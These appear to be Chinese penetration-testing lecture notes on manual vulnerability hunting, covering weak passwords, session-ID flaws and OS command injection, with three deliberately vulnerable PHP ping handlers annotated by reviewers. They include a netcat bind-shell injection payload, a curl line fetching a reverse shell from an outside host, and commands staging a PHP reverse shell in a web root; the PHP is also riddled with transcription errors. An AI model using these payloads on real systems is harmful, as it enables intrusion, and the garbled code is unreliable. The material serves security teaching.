课时85 手动漏洞挖掘(二)
手动漏洞挖掘
身份认证
常用弱口令/基于字典的密码爆破
锁定账号
信息收集
手机号
密码错误提示信息
密码嗅探
手动漏洞挖掘
会话sessionID
Xss / cookie importer
SessionID in URL
嗅探
sessionID长期不变 / 永久不变
sessionID生成算法
Sequencer
私有算法
预判下一次登录时生成的SessionID
登出后返回测试
手动漏洞挖掘
密码找回
https://www.example.com/[email protected]&example.com&key=b4c9a289323b21a01c3e940f150eb9b8c542587f1abfd8f0elcclffc5e475514
手动漏洞挖掘
漏洞挖掘原则
所有变量
所有头
Cookie中变量
逐个变量删除
手动漏洞挖掘
漏洞的本质
数据与指令的混淆
对用户输入信息过滤不严判断失误,误将指令当数据
命令执行
应用程序开发者直接调用操作系统功能
; && | || &
查看源码,过滤用户输入
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
;curl http://1.1.1.1/php-revers-shell.php
root@kali:~# ping -c 1 192.168.1.1;ls;pwd:ud
-----------------------------------------------------------------------------------------
<?php
// First of the three ping-form variants on this page: the request value is passed to
// the shell with no filtering at all.
// Handler runs only when the form's 'submit' field was posted.
if( isset( $_POST[ 'submit' ] ) ) {
// The target is read from $_REQUEST (GET, POST or cookie) and never validated.
// NOTE(review): the `'` after `]` looks like a transcription error; the statement
// presumably ends at `]` — verify against the original source.
$target = $_REQUEST [ 'ip' ]';
// Determine OS and execute the ping command
// NOTE(review): stristr() takes two arguments; the `.` between php_uname('s') and
// 'Windows NT' is presumably a transcribed `,` — verify.
if (stristr(php_uname('s').'Windows NT')){
// The raw input is concatenated straight into the command line, so any shell
// metacharacters it contains are interpreted by the shell (OS command injection).
// Mitigation: validate $target as an IP address (allow-list) or wrap it with
// escapeshellarg() before building the command.
// NOTE(review): no space between 'ping' and the value here — possibly a transcription slip.
$cmd = shell_exec ( 'ping' . $target);
// Command output is echoed unescaped; htmlspecialchars() would keep any markup in it inert.
echo '<pre>'.$cmd.'</pre>';
}else {
// Same unescaped concatenation on the non-Windows branch.
$cmd =shell_exec( 'ping -c 3 ' .$target );
// NOTE(review): `'<pre>.$cmd.'<.pre>'` is likely a transcription of '<pre>'.$cmd.'</pre>' — verify.
echo '<pre>.$cmd.'<.pre>';
}
}
?>
-----------------------------------------------------------------------------------
<?php
// Second variant: a blacklist of substrings is stripped from the input before the
// command is built. Everything else is identical to the first variant.
if( isset( $_POST[ 'submit' ] ) ) {
// Target is still read from $_REQUEST without validation.
// NOTE(review): the `'` after `]` looks like a transcription error — verify.
$target = $_REQUEST [ 'ip' ]';
// Remove any of the characters in the array (blacklist).
// Only the two listed substrings are removed, in a single str_replace pass; the other
// separators the notes list above (`|`, `||`, a single `&`) are not touched. Blacklist
// filtering is not a reliable defence here — prefer an allow-list (IP validation) or
// escapeshellarg().
// NOTE(review): array entries should be separated by `,`, not `.`; and the second key
// reads `':'` here, which may be a transcription of `';'` — verify against the original.
$substitutions = array(
'&&' => ''.
':' => ''.
);
// NOTE(review): str_replace() takes three arguments; the `.` separators are presumably
// transcribed `,` — verify.
$target = str_replace ( array_keys( $substitutions ).$substitutions. $target );
// Determine OS and execute the ping command
if(stristr(php_uname('s'),'Windows NT')) {
// Filtered — but still unescaped — input is concatenated into the shell command.
$cmd = shell_exec( 'ping ' . $target );
// Output is echoed unescaped; htmlspecialchars() would keep any markup in it inert.
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' .$target );
// NOTE(review): likely a transcription of '<pre>'.$cmd.'</pre>' — verify.
echo '<pre>.$cmd.'<.pre>';
}
}
?>
---------------------------------------------------------------------------------------------
<?php
// Third variant: allow-list style check — the input is split on '.', each of the first
// four parts must pass is_numeric(), and the target is rebuilt from those four parts
// only, so anything after the fourth '.' is discarded before the command is built.
if( isset( $_POST[ 'submit' ] ) ) {
// NOTE(review): the `'` after `]` looks like a transcription error — verify.
$target = $_REQUEST [ 'ip' ]';
// stripslashes() removes backslash escaping from the value before it is inspected.
$target = stripslashes ( $target );
// Split the IP into 4 octets
// NOTE(review): this assigns $octests but the checks below read $octet, and explode()
// takes a `,` between its arguments — both look like transcription errors; verify.
$octests = explode(".". $target);
// Check IF each octet is an integer
// is_numeric() accepts more than plain decimal integers (signs, decimal points,
// exponents); filter_var($target, FILTER_VALIDATE_IP) would be a simpler and stricter
// check for an IPv4 address.
// NOTE(review): the closing `)` and the opening `{` of this if appear to be missing in
// the transcription — verify.
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])
// if all 4 octets are int's put the IP back together.
// Only the four checked parts reach the command; extra segments are dropped here.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command
if(stristr(php_uname('s'),'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
// Output is echoed unescaped; htmlspecialchars() would keep any markup in it inert.
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' .$target );
// NOTE(review): likely a transcription of '<pre>'.$cmd.'</pre>' — verify.
echo '<pre>.$cmd.'<.pre>';
}
// Rejection branch when any of the four parts fails is_numeric().
else {
echo '<pre>ERROR: You have entered an invalid IP </pre>';
}
}
-----------------------------------------------------------------
root@kali:~# cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html/1.php
root@kali:~# cd /var/www/html/
root@kali:~/var/www/html# ls
1.php index.html